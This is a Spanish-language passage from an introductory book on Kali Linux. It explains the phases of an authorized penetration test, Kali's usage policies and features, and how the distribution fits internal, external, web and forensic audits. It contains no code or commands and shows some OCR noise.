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Introducción 


El complejo mundo de la seguridad informática presenta novedades día a día y requiere que el 
auditor o pentester se encuentre en constante crecimiento profesional. Los auditores de seguridad 
suelen disponer de un kit de herramientas, en su cajón de sastre o aplicaciones preferidas, con las 
que realizar sus proyectos. 


A nivel mundial BackTrack cubría un gran espectro en lo que herramientas de seguridad se refiere, 
copando los primeros puestos en distribuciones de seguridad. BackTrack ha dejado una huella en la 
comunidad de la seguridad mundial y Kali Linux tiene capacidad para coger dicho relevo. La nueva 
distribución que sustituye a BackTrack viene implantada sobre un sistema Debian y con la limpieza 
de herramientas que los usuarios solicitaban desde hace ya años. 


Ahora es más sencillo encontrar las herramientas necesarias para cada rama del pentesting. Kali 
Linux ofrece al usuario numerosas aplicaciones para todas las vías del pentesting desde la recolección 
y análisis de información hasta la explotación de vulnerabilidades de sistemas, web o Wireless. 
Además, se dispone de herramientas para análisis forense, que si bien no es una rama como tal del 
pentesting, se puede considerar una rama importante de la seguridad informática. 


El libro llevará al lector al punto de vista del pentester con la idea de introducirle en aspectos técnicos 
y a la vez escenificar situaciones reales que puedan simplificar el proceso de aprendizaje del lector. 
Las pruebas de concepto que se detallan en el libro, como se ha mencionado anteriormente, son 
situaciones y escenarios que fácilmente se pueden encontrar en empresas y organizaciones durante 
el proceso de pentesting. 


Hay que tener en cuenta que el libro no pretende detallar o explicar cada herramienta que se 
encuentra en la distribución Kali Linux, ya que este hecho llevaría a escribir de cada capítulo un 
libro propio. El libro pretende detallar cada parte del pentesting, enumerar las aplicaciones para 
dicha rama y detallar, mediante la exposición de casos prácticos o pruebas de concepto, algunas de 
las herramientas imprescindibles. 


Como curiosidad final indicar que Kali Linux proporciona al pentester un top 10 de herramientas de 
seguridad, las cuales se pueden llamar las “imprescindibles de Kali Linux”. Este tipo de herramientas 
serán tratadas especialmente en el libro dotándolas de gran cantidad de información. 


El mundo de la seguridad informática recibe a Kali Linux con gran expectación y este libro llevará 
dicha expectación al lector, el cual aprenderá técnicas de auditoría profesional mediante una de las 
mejores distribuciones de seguridad del entorno profesional. 
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Capítulo I 
Pentesting 


Para quienes no estén familiarizados con éste término, los test de intrusión o pentesting evalúan 
los niveles de seguridad de un sistema informático o red mediante la simulación, en un entorno 
controlado, de un ataque por parte de un usuario malicioso conocido comünmente como hacker. 
Lo cual implica un proceso de análisis activo del sistema en busca de posibles vulnerabilidades 
que podrían resultar de una mala o inadecuada configuración de un sistema, defectos en software 
conocidos o no (Zero-Days, exploits para determinadas productos, etcétera) o un fallo de seguridad 
en un sistema operativo o hardware 


Éste análisis se realiza desde la posición de un atacante potencial, y puede implicar la explotación 
activa de vulnerabilidades de seguridad. Los problemas de seguridad que se encuentran se 
presentarán al propietario del sistema junto con una evaluación del impacto que supondría dentro de 
la organización, además de una propuesta de mitigación o una solución técnica. 


El propósito de una prueba de penetración es determinar la viabilidad de un ataque y la cantidad de 
impacto en el negocio de la explotación exitosa, si se descubre. La mejor manera de demostrar la 
fuerza de una defensa es tratando de penetrar en ella. 


Dado que las pruebas de penetración están diseñadas para simular un ataque y utilizar herramientas 
y técnicas que pueden ser restringidos por la ley, las regulaciones federales, y la política de la 
organización, son imprescindibles para obtener el permiso formal para la realización de pruebas de 
penetración. 


Este permiso debe estar previamente acordado, organizado y plasmado en un documento físico 
firmado por ambas partes, donde se indicarán cuáles serán las pautas a seguir, y a partir de aquí 
empiezan a entrar en juego las fases de un test de intrusión, que se detallan a continuación. 


1. Fases de un test de intrusión 


A la hora de realizar un test de intrusión se pueden ver diferentes etapas, que si no son realizadas en 
el orden correcto podrían dar lugar a problemas con el cliente que pide la auditoría, ya que se podría 
poner en riesgo el entorno de producción, o simplemente se vulneran sin permiso los derechos de la 
propiedad intelectual y privada de la organización que se está poniendo a prueba. 
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Las etapas que se mencionaban anteriormente persiguen objetivos particulares y son claramente 
diferenciables una de otras. Sin embargo si bien se debe dejar claro su importancia individual 
también es conveniente recordar que se persigue un objetivo común, que es preservar la seguridad. 


Las fases del test de intrusión son las siguientes: 
- Reglas del juego: Alcance y términos del test de intrusión. 
- Recolección de información 
- Análisis de las vulnerabilidades. 
- Explotación de las vulnerabilidades. 
- Postexplotación del sistema. 
- Generación de informes. 


А continuación se pasará a describir con mayor detalle cada una de la fases comentadas, con la 
intención de que aquellos que conocen el tema les resulte agradable recordar los conceptos que 
alguna vez adquirieron, y para quienes no lo conozcan lo encuentren motivador a la vez de didáctico 
en su ambiente de trabajo o de crecimiento personal. 


Reglas del juego: Alcance y términos del test de intrusión 


Cuando se hace referencia a las reglas del juego se hace un símil a las normas que rigen cualquier 
actividad recreacional donde se imponen unos límites de acción, como podría ser el ajedrez, donde 
las piezas tienen un determinado tipo de movimiento y cantidad de desplazamiento, etcétera. 


El caso del pentesting es similar, ya que al inicio de toda auditoría se debe llegar a un acuerdo sobre 
los objetivos que el cliente desea alcanzar mediante el test, los límites a los que se verán expuestos el 
equipo de auditores, es decir, el ámbito de acción, ya que la información que estará a su disposición 
será totalmente confidencial. Todo lo acordado deberá ser recogido en un documento firmado por 
ambas partes donde se declare la conformidad con los responsables del proyecto. Es importante 
que sea de esta manera ya que en el caso de que alguna de las partes tenga alguna queja o reclamo 
en relación a las vías o maneras que se están adoptando para realizar la prueba, siempre se podrá 
recurrir al contrato para verificar que no se vulnera ninguna norma allí establecida. 


Normalmente en esta etapa el cliente se da cuenta realmente de los peligros a los que se ve expuesta 
su organización, y se conciencia sobre la necesidad de realizar una auditoría de seguridad para 
preservar sus intereses cada cierto periodo de tiempo, atendiendo a las nuevas y novedosas formas 
que al pasar el tiempo van encontrando los posibles atacantes para llegar a su objetivo. 


Puede ocurrir que el cliente quiera delimitar el ámbito de la prueba, por lo que se incorporan ciertas 
restricciones al test. Estas restricciones, siempre y cuando vayan por contrato, deben ser tomadas 
muy en cuenta por parte del auditor, ya que la información que se manejará será confidencial. 
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Recolección de información 

Se podria decir que ésta es la primera etapa puramente práctica, donde el equipo de auditores hará 
uso de las técnicas de Footprinting, Fingerprinting, Google Hacking, entre otras, para intentar 
obtener la mayor cantidad de información sobre la organización que se va a someter al test, 


Otras vías muy comunes de localizar información es en redes sociales (a día de hoy en dichas redes 
hay mucha más información de la que debería o se desearía), ingeniería social a los trabajadores 
de la empresa, o simplemente en blogs dedicados, donde no simplemente podrían hablar acerca de 
elementos de la empresa, sino que en algún caso se comentan también los fallos de seguridad que 
algún usuario inquieto ha logrado descubrir y lo publica para dar a conocer sus dotes artísticas a la 
hora de acceder a los sistemas informáticos ajenos. 


No sería la primera vez que una auditoría de seguridad empieza y acaba en un blog, donde 
posteriormente se contrastan los resultados y se harían las comprobaciones sobre las afirmaciones 
que allí se comentan, ahorrando mucho tiempo en exhaustivas büsquedas de fallos. 


Todo ello lleva a la posibilidad de que el auditor consiga hacerse con una clara imagen del objetivo, 
saber su funcionamiento, cómo fue concebido e incluso saber los posibles y más comunes fallos de 
implementación que ocurren a la hora de pasar de una idea de proyecto informático a la realidad. 
De ésta manera se podría tener una visión amplia de los tipos de controles de seguridad existentes y 
por ende saber cuál es la mejor manera de atacar a la víctima y extraer toda la información que sea 
posible de ella. 


Esto ültimo es muy importante porque si se conoce la forma de actuar de un sistema o mecanismo de 
protección siempre podría pensarse en un sistema de contramedidas para burlarlo. 


Análisis de vulnerabilidades 


Después de recolectar toda la información disponible en la red o mediante las técnicas adecuadas, 
aün queda analizar y organizar todos los resultados, ya que a partir de ellos se puede derivar el 
descubrimiento de agujeros de seguridad y con todo ello se podría ya planificar el método de acción 
о ataque que mejor se adapte a la situación. 


En esta información recopilada se pueden encontrar diferentes vulnerabilidades existentes en el 
sistema. Después de ello hay que realizar un modelado con toda la información extraída, y tras un 
breve estudio se podría determinar el método de ataque más eficaz para la situación, simulando los 
procedimientos que un atacante comün realizaría para explotar las debilidades en la seguridad de un 
sistema víctima. 


A continuación y de forma conjunta con los datos recogidos en la fase anterior, se identificarán 
las vías de acción con más posibilidades de éxito, conformándose de ésta manera el mejor plan de 
acción, para poder acceder a la información del sistema. 
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El uso de escáneres y análisis de puertos, entre otros, son los procedimientos habituales en esta 
etapa, 


Explotación de las vulnerabilidades 

Se podría decir que por fin ha llegado la fase que más entusiasmo aporta a los auditores, y es la fase 
de romper cosas (informáticamente hablando), donde los auditores basándose en la información 
recopilada anteriormente y fundamentándose en su experiencia adquirida después de arduas horas 
de trabajo o simplemente lo que comúnmente se denomina “idea feliz", logran superar las barreras 
de seguridad que plantean las organizaciones dejando en descubierto las vías por las cuales un 
atacante externo puede hacerse con el control del sistema víctima. 


Sin embargo no todo es felicidad en ésta etapa, ya que también es común caer en la cuenta de que 
si hubo errores a la hora de recoger la información en los pasos previos, en ésta etapa se caerá en 
falsos positivos que no solamente perjudicarán en el tiempo utilizado sino que también podrían 
poner en tela de juicio la veracidad o fiabilidad del proceso que se ha empleado para realizar dicha 
recolección de información, y con lo cual se pondría en riesgo el informe posterior que se querrá 
presentar al cliente. 


Uno de los elementos más utilizados a la hora de querer tomar el control de un sistema es el uso de 
exploits, lo cual generará una pregunta en alguno de los lectores, sobre todo en los que descubren 
por primera vez esta palabra ¿Qué es un exploit? Para hallar la respuesta a esta interrogante se 
podría ir directamente a la propia etimología de la palabra exploit que proviene del inglés to exploit, 
que significa explotar o aprovechar, lo cual trasladándose al ámbito informático se podría concluir 
que se trata de un conjunto de acciones, códigos o secuencias de comando con los cuales se quiere 
aprovechar o explotar una vulnerabilidad de un sistema informático con el afán de conseguir un 
comportamiento beneficioso para el atacante, o lo que es lo mismo, no deseado para la víctima, 


Sin embargo es verdad que un hacker puede lanzar todos los exploits que desee sin importarle las 
consecuencias que con ello origine en la organización que está atacando, pero el equipo de auditores 
dedicados al hacking ético no puede permitirse ese lujo, porque debe asegurarse en todo momento 
de tener el control de las acciones que están realizando, por lo que solamente debería ser lanzado 
si se dispone de la certeza de que se obtendrá un resultado positivo en la prueba. Es por ello que, 
aunque la automatización está muy bien vista para la realización de labores de auditoria, en este 
caso no se considera una buena práctica, ya que el uso de herramientas para realizar el lanzamiento 
automatizado e indiscriminado de exploits, aunque resulta beneficioso en tiempo, casi nunca se 
posee el completo conocimiento de lo que realiza cada uno de los exploit y podría generar más daños 
que beneficios al sistema testeado. 


La única forma de que una automatización sea segura es lanzando los ataques únicamente sobre las 
certezas que se tengan. 
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Uno de las herramientas más populares para la realización de estas labores es Metasploit Framework, 
que se encuentra en el Top Ten de las herramientas más utilizadas y, como no podía ser de otra 
manera, también se encuentra incluido dentro de la distribución Kali Linux. 


Postexplotación del sistema 


Es una fase muy importante en lo que se refiere a la totalidad del test de intrusión, y llegados a este 
punto del test se supone que ya se posee el acceso al sistema o a parte del mismo, sin embargo ¿Por 
qué detenerse o conformarse con el control de un solo equipo? Se supone que una vez que se obtiene 
el acceso a un equipo es como si se estuviese físicamente dentro de la red institucional, entonces... 
¿que impediría a un supuesto hacker intentar controlar todos y cada uno de los equipos de la red? 
¿No sería interesante hacerse con el control de un equipo que posea un nivel de importancia muy por 
encima del que inicialmente ha sido controlado? 


Para dar un ejemplo claro piénsese que se tiene controlado un equipo que se encuentra en la misma 
red de uno de los ordenadores principales de la organización. Lo primero que se pensaría es que 
desde esta máquina de menor nivel se podría auditar a dicha maquina con mayor peso, localizando 
sus puntos débiles y dando lugar a la realización de un proceso de explotación de vulnerabilidades 
para lograr el control completo de dicho sistema, logrando obtener datos interesantes como podrían 
ser cuentas de usuarios, rutas de acceso a dispositivos de almacenamiento masivo de la empresa, 
etcétera. 


Conociendo que se puede hacer este tipo de infiltración a través de un primer equipo controlado, se 
empieza a tener la certeza de que se puede hacer con cualquier equipo de la organización, realizando 
la técnica comúnmente llamada “pivoteo” es decir, saltando de un equipo a otro con la intención de 
controlar a todos los equipos que conforman la red corporativa. 


Generación de informes 

Ésta sería la última fase, pero no carente de importancia ya que es considerada la parte más importante 
del test, y es donde se informa al cliente sobre cada una de las acciones y pruebas que se han 
realizado y los resultados que se han obtenido en cada una de ellas, documentando todo con capturas 
de pantalla, recopilación de rutas donde se han encontrado parámetros vulnerables, etcétera. 


Es importante que después de realizar cada acción, ésta sea debidamente documentada y no esperar 
al último momento, ya que sino la tarea sería mucho más tediosa e incluso podrían pasarse por alto 
alguna de las acciones que han supuesto el descubrimiento de vulnerabilidades. 


Entre toda la información que se comente en el documento final de la auditoría debe incluirse 
cada una de las tareas que se han realizado y todas las técnicas y herramientas utilizadas, y las 
formas como han sido utilizadas, además del tipo de vulnerabilidad que se ha descubierto con esa 
herramienta y el nivel de gravedad que supone para la seguridad de la organización. 
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Por otro lado es bien sabido que en una empresa hay trabajadores y encargados de diferentes áreas, 
y no necesariamente un alto ejecutivo o director de empresa tiene que tener conocimientos técnicos 
à nivel de seguridad como los de un auditor en activo. Es por ello que el informe resultante de la 
auditoría debe tener dos aspectos bien diferenciados o simplemente ser divido en dos documentos: 
un informe técnico y un informe ejecutivo. 


En el informe técnico se recogerá toda la información con mucho nivel de detalle, es decir, la lista de 
vulnerabilidades y posibles soluciones que aportará el equipo de auditores y que va a ser leído por 
profesionales que, al interpretar los documentos, van a buscar las soluciones adecuadas para paliar 
las deficiencias encontradas. 


En cambio en el informe ejecutivo se deben reportar el mismo nümero de vulnerabilidades que en el 
informe técnico, pero sin entrar demasiado en detalle para que se entiendan claramente los riesgos 
existentes en la organización. Al igual que en el reporte técnico también debería contener una lista 
de recomendaciones, que aunque no tenga carácter técnico haga entender al cliente la necesidad de 
subsanar los fallos si lo que se desea es conservar los intereses de la empresa. 


2. Políticas de uso 


Kali Linux, como en todo sistema informático que va a tener interacción con usuarios finales, debe 
tener unas reglas de uso para mantener unos límites bien marcados, para que de esta manera pueda 
perdurar en el tiempo y ser usado por cada vez más usuarios. 
Entre las políticas de uso disponibles en Kali Linux se encuentran las siguientes. 

- Política de código abierto. 

- Política de Marcas. 

- Política de usuarios Root. 

- Política de Herramientas para Pruebas de Penetración. 

- Políticas de Servicio de Red. 

- Políticas de Actualizaciones de Seguridad. 


Una vez conocidos los tipos de políticas disponibles sería conveniente conocerlas un poco más а 
fondo para garantizar el máximo aprovechamiento de ésta distribución. 


Política de código abierto 


Como ocurría con BackTrack, Kali Linux es una distribución con miles de elementos de software 
libre, y como ahora está completamente basado en la infraestructura Debian, cumple con los 
protocolos que rigen en las Guias de Software Libre de Debian. 
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La gran mayoría de desarrollos específicos de Kali Linux están hechos a medida y bajo la licencia 
GNU GPL. Sin embargo existen elementos dentro de la distribución que han sido desarrollados 
por entidades privadas pero que pueden distribuirse de forma conjunta con Kali Linux debido a un 
acuerdo con Offensive Security. Si se quiere incluir un elemento privado dentro de una distribución 
derivada de Kali Linux se debería revisar la licencia de cada paquete, en dehian/copyright o en /usr/ 
share/doc/package/copyright si ya se tiene el paquete instalado en el sistema. 


Política de marcas 


Uno de los objetivos de Kali Linux y Offensive Security es que los usuarios no se confundan a la 
hora de utilizar productos software, sobre todo para evitar que otras personas usen el nombre de 
Kali Linux u Offensive Security de forma fraudulenta. Es por ello que se intenta difundir en toda la 
comunidad el reconocimiento de las marcas que representarán a los productos y a las empresas de 
dicha agrupación. Algunas de las marcas registradas son las siguientes: 


кли Linuxe OFFENSIVE" гру ндвред 
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Imagen 01.01: Marcas registradas de Offensive Security y Kali Linux. 


Política de usuarios root 

Los administradores de sistema deben garantizar que de forma predeterminada todos los usuarios 
utilicen el sistema operativo como usuarios con privilegios limitados, de ésta forma se evitará que 
los propios usuarios dañen o corrompan el sistema, dotándolo de un nivel de seguridad adicional 
entre usuario y sistema operativo. 


Lo mismo ocurre en Kali Linux donde los usuarios son creados por defecto con privilegios de 
superusuarioo root, ya que es un sistema donde muchas de las herramientas deben ser ejecutadas 
con privilegios elevados. exige un control y separación de privilegios de usuarios para un mejor 
mantenimiento y administración del sistema. 


Política de herramientas para pruebas de penetración 


En el mundo de la informática constantemente se están creando nuevas herramientas que cumplen 
funciones nuevas o quizás realicen de manera diferente algo que ya está creado con anterioridad, y 
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no por ello pueden ser consideradas mejores o peores herramientas que las existentes, ya que eso 
queda a criterio del auditor que haga uso de una herramienta determinada. 


Sin embargo, para incluir nuevas herramientas en la distribución, el equipo de Offensive Security 
somete el nuevo software a diferentes pruebas para demostrar que tiene utilidad práctica, que cumple 
con los estándares, que el consumo de recursos se encuentra dentro de los márgenes permitidos, que 
las funciones que realiza pueden ser llevadas a cabo con alguna de las herramientas disponibles en 
la distribución, etcétera. 


Algunas herramientas específicas para DOS (Denegación de Servicio), DDOS (Denegación de 
servicio distribuida), entre otras similares no han sido incluidas por defecto en la primera versión de 
la distribución, aunque los usuarios pueden solicitar nuevas herramientas a través de la página web y 
en la sección de “rastreador de bugs” (bugs.kali.org). Si el equipo de desarrollo de Offensive Security 
considera viable la propuesta pueden incluir la herramienta solicitada en la siguiente versión para de 
esta manera mejorar cada vez más la distribución de Kali. 


Políticas de servicio de red 


Cuando se realiza un test de intrusión lo último que se pretende es que se detecte la presencia de 
los auditores ya que sería como si el verdadero hacker fuera descubierto. Por esa razón Kali no 
permite que desde el exterior se encuentre algún servicio escuchando. Además cuenta con diferentes 
servicios previamente instalados como SSH y Apache listos para ser iniciados de forma manual. 


Políticas de actualizaciones de seguridad 


Como ocurre con la mayoría de las distribuciones Linux eventualmente se reciben actualizaciones 
de seguridad que hacen que la versión sea más completa y por consecuencia más útil para quienes lo 
usan. En el caso de Kali Linux es igual, ya que al basarse íntegramente en Debian recibirá todas las 
notificaciones correspondientes a la distribución principal. 


Sin embargo los paquetes modificados en Kali no sufrirán modificaciones en dichas actualizaciones, 
renovándose cuando el equipo de Offensive Security y específicamente el equipo de Kali Linux suba 
versiones mejoradas o parches de seguridad necesarios para aumentar el rendimiento y usabilidad 
de la versión. 


3. ¿Por qué Kali? 


Tras poco más de siete años de vida de la distribución BackTrack Linux que se ha ganado 
merecidamente una innumerable cantidad de adeptos, Offensive Security llegó a la clara conclusión 
que debía darse una vuelta de tuerca al asunto y sacar a la luz una nueva generación de distribuciones 
totalmente orientada a los test de penetración, es decir, una herramienta de uso profesional que sirva 


de la forma más completa, eficaz y eficiente a los auditores de seguridad en el cumplimiento de su 
labor. Todo ello avalado por la experiencia y conocimiento en la materia de los profesionales que 
conforman su equipo, y que a lo largo del tiempo han llevado a BackTrack hasta la popularidad que 
hoy en día sustenta. 


Así que tras un año trabajando en desarrollo, pruebas y explotación de forma silenciosa de un 
nuevo sistema que revolucione el entorno tal cual se conoce, Offensive Security (Uniendo fuerzas 
con Rapid?, desarrolladores a su vez de la conocida herramienta Metasploit.) ha dado luz verde al 
lanzamiento de la marca Kali Linux ТМ, uno de los sistemas de pentesting más avanzado, robusto y 
estable hasta la fecha. 


The quieter you become, the more you are able to hear 


Imagen 01.02: Logotipo oficial de Kali Linux. 


Kali Linux 1.0 es una reestructuración masiva de BackTrack 5, sin embargo, la diferencia sustancial 
de ésta nueva distribución es que, además de no llamarse BackTrack 6, se cambia el entorno 
basado en Ubuntu 10.04 LTS por un auténtico sistema Debian, específicamente en la distribución 
Debian Wheezy, lo cual ofrece un abanico de posibilidades completamente nuevo, proporcionando 
compatibilidad a más de 300 herramientas para realizar labores de pentesting, cumpliendo los 
estándares, las políticas de Debian y siguiendo las mejores prácticas de uso en dicho entorno. 


Después de un análisis de uso de todas las herramientas incluidas en BackTrack, se ha llegado a la 
conclusión de que muchas, o no funcionaban correctamente о no cumplían con los estándares de 
desarrollo seguro. 
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Aunque la mayoría de los desarrolladores lo saben y se entiende que la mayoría de la gente dedicada a 
la seguridad informática también lo debe saber, айп hay profesionales que no encuentran las palabras 
adecuadas para definir lo que es desarrollo seguro a una persona que carezca de conocimientos 
técnicos, y aunque el objetivo de éste libro es guiar a los usuarios avanzados a sacar el máximo 
provecho a la nueva distribución de pentesting, resulta interesante dejar claro éste concepto para no 
renunciar en ningün momento a los usuarios que, aunque ésta sea la distribución con la que hagan 
su primera toma de contacto con el mundo de la seguridad y auditoría informática, sean capaces de 
aprender y afianzar conceptos antes de entrar en este mundo de la seguridad informática. 


Cuando se habla de desarrollo seguro se refiere a la creación de productos software que cumplan 
únicamente con las labores o fines por las cuales han sido diseñados y desarrollados, y que a través 
de ellos no se pueda realizar otra actividad diferente, maliciosa o que atente contra la seguridad del 
equipo donde se está ejecutando. Por ejemplo: Una pequefia aplicación de comandos que realice una 
suma de dos nümeros enteros que se reciban como parámetros, no debe crear un desbordamiento de 
buffer, crear un acceso no controlado a alguna dirección de memoria o simplemente no debe crear 
ni modificar ningün archivo (de usuario o sistema) si no está previamente declarado en los fines de 
la aplicación, en caso contrario se considera un código no seguro y por lo tanto no es válido para ser 
incluido por defecto en una distribución donde lo que se persigue a priori es la seguridad. 


Por otro lado, también se han dejado fuera de Kali Linux algunas aplicaciones que aunque eran 
fáciles de utilizar son redundantes, y existen otras herramientas disponibles que proporcionan una 
funcionalidad parecida o incluso superior. 


Todo esto se ha realizado con la ünica intención de proporcionar a los usuarios finales una distribución 
madura y segura donde se persigan los objetivos por los que fue creado su predecesor. 


Entre algunas de las características que se podrían mencionar de Kali Linux se encuentran: 


- QGransoporte para dispositivos inalámbricos, permitiendo que funcionen correctamente una 
amplia variedad de hardware, como numerosos USB y otros dispositivos de almacenamiento 
masivo. 


- A la hora de desarrollar y construir las soluciones de cada una de las herramientas se 
utiliza Git como software de control de versiones y que es totalmente compatible con el 
estándar de jerarquía del sistema de archivos FHS (Filesystem Hierarchy Standard). 


- La empresa es totalmente partidaria del uso y desarrollo de código abierto, estando el 
mencionado código (archivos binarios, archivos de soporte, bibliotecas, etcétera.) disponible 
para el uso y disfrute de los usuarios para los que deseen conocerlos, modificarlos o 
reconstruirlos para su uso o su posterior distribución siempre respetando el espíritu open 
Source. 

- El equipo de desarrollo de Kali es un grupo reducido de personas de confianza con alto 
nivel técnico que interactúan con los paquetes que componen los repositorios haciendo uso 
de protocolos seguros, todo ello para garantizar un entorno de desarrollo fiable. 

- Las herramientas pueden ser escritas en diferentes idiomas, no solamente en inglés, que 
es el idioma en el que habitualmente son escritas múltiples aplicaciones, asegurando de ésta 
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manera un soporte multilingüe para que los usuarios puedan operar en su idioma nativo o en 
el que más cómodos se sientan a la hora de utilizar las herramientas que deseen y realizar su 
trabajo de la manera más sencilla y práctica. 

- Cada uno de los paquetes del repositorio de Kali son firmados individualmente por su 
desarrollador con GPG (GNU Privacy Guard) aunque la mayoría se importan sin alterarse 
desde los repositorios de Debian, 

- El entorno es completamente personalizable ya que se es consciente de que, aunque el 
equipo de Offensive Security haya optado por un diseño neutro o estándar, los usuarios finales 
no siempre están de acuerdo con la propuesta y querrán amoldarlo a sus gustos o preferencias. 
Es decir, Kali Linux deja abierta la posibilidad de que sus usuarios puedan modificar el 
aspecto de su distribución totalmente a su gusto, desde los colores, salvapantallas, directorios 
de usuarios y fuentes, hasta dar la posibilidad a los usuarios avanzados puedan alterar la 
configuración del kernel según su propio criterio y responsabilidad. 

- Сото se mencionaba en un punto anterior, Kali utiliza código abierto, por lo tanto es 
código público que cualquier desarrollador podría tener a mano para realizar los objetivos 
que se proponga, al igual que su predecesor BackTrack, es totalmente gratuito y se mantendrá 
así. De esta forma encontrarse algún sitio en la red donde se ponga a la venta una versión de 
Kali Linux que sea de pago, hace sospechar que se está delante de una persona o conjunto 
de ellas que quieran aprovecharse de la popularidad del producto para obtener beneficios 
ilícitamente. Hoy día no hay que pagar por Kali Linux, disponible en la web: www.kali.org 


Por otro lado muchos conocen las bondades que ofrece ARM (una familia de microprocesadores con 
arquitectura RISC — Reduced Instruction Set Computer - producidos por la empresa ARM Holdings). 
Debido a su bajo coste cada vez es más frecuente encontrarse con dispositivos que trabajen bajo éste 
tipo de arquitecturas. 


Kali, como no podía ser de otra manera, trae soporte para ARM en sus dos vertientes, ARMEL y 
ARMHF. 


- ARMEL fue principalmente diseñada para hardware de gama baja, soportando un conjunto 
de instrucciones ARMv4 y hardware de punto flotante a través de un modo de compatibilidad. 
Lamentablemente disminuye el rendimiento para poder permitir la compatibilidad con el 
código escrito para procesadores sin unidades de punto flotante. 


- Рог el contrario ARMHF fue concebido para el hardware de gama alta y es compatible 
con АКМУТ, por lo cual es más rápido y tiene apoyo directo de hardware de punto flotante sin 
compatibilidad hacia atrás. Este modelo sería el más similar a las arquitecturas i386 у 1686. 


Kali Linux está actualmente disponible para los siguientes dispositivos ARM: 
- Raspberry Pi 
= rk3306 mk/ss808 
- ODROID U2/X2 
- Samsung Chromebook 
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Imagen 01.03: Imagen de una Raspberry Pi. 


Los repositorios de las herramientas para ARM serán actualizadas a la par que el resto de la 
distribución. 
Obviamente Kali Linux es una nueva distribución y tiene unas claras diferencias con la distribución 
Debian en la que está basada. Entre dichas diferencias se encuentran: 
- Es necesario tener un kernel modificado, actualizado y optimizado (parcheado) para 
realizar el proceso de pentesting a la red Wireless, ya que se realizarán auditorías de seguridad. 
- Kali Linux ha sido diseñado para que predeterminadamente exista solo un tipo se usuario, 
el superusuario о roof. 


- Еп Kali Linux existen hooks sysvinit que por seguridad deshabilitan los servicios de red 
por defecto. 


4. Visión global en Kali del pentesting 


Al principio BackTrack fue concebido y desarrollado como una recopilación de herramientas para 
uso personal por parte de Offensive Security para la realización de tareas de análisis forenses y 
auditorías informáticas, sin embargo, al pasar los años su popularidad ha crecido hasta límites 
insospechados, ya que hoy en día hablar de pentesting sin que aparezca la palabra BackTrack es 
inusual sin llegar a la exageración de decir que es prácticamente imposible. Aunque siempre habrá 
quienes piensen que si no existiera dicha distribución de igual manera se podrían realizar las labores 
de auditoría y que no es indispensable, pero no podrán negar que con ella todo se simplifica mucho, 
sobre todo cuando la sencillez de tener todas las herramientas a mano supone ahorrar mucho tiempo 
de trabajo y por lo tanto dinero. 


Después de todo lo comentado anteriormente, en muchas conversaciones de profesionales de la 
informática empezará a sonar la palabra "Kali", y muchos usuarios de diferentes sistemas operativos 
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se interesarán en él, tras lo cual surge una buena pregunta: ;Es "Kali" una distribución adecuada 
para cualquier persona? 


Kali Linux ha sido desarrollada (y sigue desarrollándose) específicamente para la realización de 
test de intrusión, por lo tanto para desenvolverse a la perfección en el entorno hace falta, en primer 
lugar, conocer previamente el funcionamiento del sistema operativo Linux, de lo cual hay cantidades 
ingentes de documentación en la red, en caso contrario sería buena idea abstenerse de iniciarse 
en Kali ya que no es recomendado para principiantes Linux debido a que estos usuarios son más 
propensos a cometer errores con el uso de la cuenta del superusuario o root. Pudiendo causar daños 
irreparables y desencadenar fallos significativos en el sistema. (En la web oficial de Kali Linux está 
toda la documentación al respecto). 


Después conviene recordar que la distribución está orientada específicamente a las pruebas de 
intrusión de carácter profesional y auditorías informáticas en el plano de la seguridad, por lo tanto 
no es una distribución recomendada para cualquier usuario ajeno a éste círculo. 


Kali en el entorno de una auditoría interna 


El entorno privado de una empresa u organización puede ser un esquema complejo y foco de 

vulnerabilidades que aunque no se ven, existen. Por ello y debido a la importancia de evitar la fuga 

0 robo de información confidencial de la empresa, es vital apoyarse en una auditoría interna que 
| verifique el estado de la seguridad de la organización. 


La auditoría de seguridad interna o auditoría de caja blanca asume el rol de un usuario que dispone 
de acceso a los sistemas internos de la empresa o desde un sistema conectado a dicha red, bien 
porque sea el duefio de las credenciales o porque mediante un ataque ha elevado privilegios de forma 
ilícita. 


Con el uso de las herramientas que proporciona Kali Linux se intenta detectar y mitigar el máximo 
de vulnerabilidades en servidores internos, comunicaciones no seguras en la red corporativa, 
malas configuraciones, sistemas desactualizados, redes Wireless no seguras, etcétera. En definitiva 
potenciales vectores de ataque que puedan provocar robo de información sensible en una empresa. 


Kali en el entorno de una auditoría externa 


Las empresas en la actualidad poseen gran cantidad de servicios püblicos los cuales pueden ser una 
pasarela hacia información o datos sensibles de éstas. 


La auditoría de seguridad externa o auditoría de caja negra asume el rol de un atacante externo a 
la empresa o hacker que sin el conocimiento de ninguna información previa puede obtener algün 
beneficio de la organización o, incluso, acceso a información sensible que comprometa la privacidad 
de la empresa, poniendo a prueba el estado de las barreras de seguridad que dispone la empresa entre 
Internet y su red corporativa. 
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Este tipo de auditoría pretende valorar el grado de seguridad de la red externa de una empresa y 
mediante la simulación de un ataque externo se evalúa la misma. Se pretende descubrir el mayor 
número de vulnerabilidades en los servicios públicos y fallos de seguridad, que pueden ser el 
resultado de una mala configuración, que existen en dichos servicios, Otro de los grandes objetivos 
de la auditoría externa es aumentar la seguridad mediante la presentación de planes de mejora que 
deben ser implantados en la empresa. 


Kali Linux posee un completo abanico de pos lades para afrontar este tipo de auditorías, 
y también proporciona herramientas para realizar informes completos de las actividades que se 
realizar para completar estas pruebas. 


Kali en el entorno de una auditoría web 


A día de hoy, la gran mayoría de las aplicaciones y servicios web son potencialmente susceptibles 
а un conjunto de ataques independientes de la plataforma o tecnología utilizada y normalmente 
tienen su origen en defectos en el diseño e implementación de las aplicaciones, en la programación 
descuidada de las rutinas, en la pobre implementación de medidas de control de acceso o en la falta 
de validación y saneamiento de los datos de entrada, Este tipo de ataques a aplicaciones web pueden 
suponer grandes pérdidas económicas sobre la empresa afectada, lo que posiblemente desemboque 
en una mala imagen hacia nuevos clientes o asociados. 
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Imagen 01.04: Auditoría de Seguridad Web. 


Mediante el uso de las aplicaciones preinstaladas en Кай! Linux y las disponibles en los repositorios 
oficiales, se pueden identificar qué vulnerabilidades contiene la aplicación, aunque nunca se puede 
dejar de lado la habilidad del auditor, quien haciendo uso de las técnicas, automatizadas y manuales 
más novedosos, logrará completar el objetivo de manera satisfactoria, completando cada etapa de 
evaluación con el sistema de informes incluidos en ésta distribución. 
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Kali еп el entorno de un análisis forense 

Un análisis forense de sistemas operativos consiste en la recuperación y tratamiento de información 
después de que ocurra algún tipo de incidente, donde no solamente hay que ser cauto a la hora de 
recoger información sino que también es importante saber qué datos o pruebas pueden resultar más 
